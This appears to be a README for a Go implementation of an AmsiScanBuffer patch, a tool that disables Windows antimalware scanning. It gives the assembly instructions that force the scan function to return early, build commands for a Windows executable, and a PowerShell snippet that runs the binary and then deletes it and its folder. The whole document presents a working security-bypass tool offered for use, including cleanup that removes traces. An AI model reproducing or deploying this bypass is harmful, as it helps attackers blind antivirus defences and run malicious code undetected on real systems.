README
¶
Overview
This repo contains a Golang implementation for a custom AmsiScanBuffer patch. I used this site to assemble the code, https://defuse.ca/online-x86-assembler.htm#disassembly.
My implementation
- xor eax, eax ; Clear the EAX register by XORing it with itself
- shl eax, 16 ; Shift the contents of EAX left by 16 bits, effectively clearing the lower 16 bits
- or ax, 0x57 ; Set the lower 16 bits of EAX using a bitwise OR operation with the value 0x57
- ret ; Return from the current subroutine
Setup
Install Golang
wget https://go.dev/dl/go1.22.0.linux-amd64.tar.gz
sudo tar -C /usr/local -xvf go1.22.0.linux-amd64.tar.gz
sudo nano ~/.profile
export PATH=$PATH:/usr/local/go/bin
source ~/.profile
Setup Golang Environment
go env -w GO111MODULE=auto
From within source directory
go mod init main
go mod tidy
Install compiler on Debian-based machine
sudo apt install gcc-mingw-w64-x86-64
How to compile
GOOS=windows GOARCH=amd64 CGO_ENABLED=1 CC=x86_64-w64-mingw32-gcc go build -o test.exe am_s.go
Create tarball containing executable
tar -czvf test.tar.gz test.exe
Execute the binary
$tarGzFile = "C:\Users\user\Desktop\test.tar.gz"
$destinationFolder = "C:\Users\user\Desktop\test_extraction"
if (-not (Test-Path -Path $destinationFolder)) {
New-Item -ItemType Directory -Path $destinationFolder | Out-Null
}
tar -xzf $tarGzFile -C $destinationFolder
Set-Location -Path $destinationFolder
$binaryFile = Get-ChildItem -Path $destinationFolder -File | Where-Object { $_.Extension -eq ".exe" } | Select-Object -First 1
if ($binaryFile) {
& $binaryFile.FullName
Remove-Item -Path $binaryFile.FullName -Force
cd ..
Remove-Item -Path $destinationFolder -Recurse -Force
}
Documentation
¶
There is no documentation for this package.
Source Files
Click to show internal directories.
Click to hide internal directories.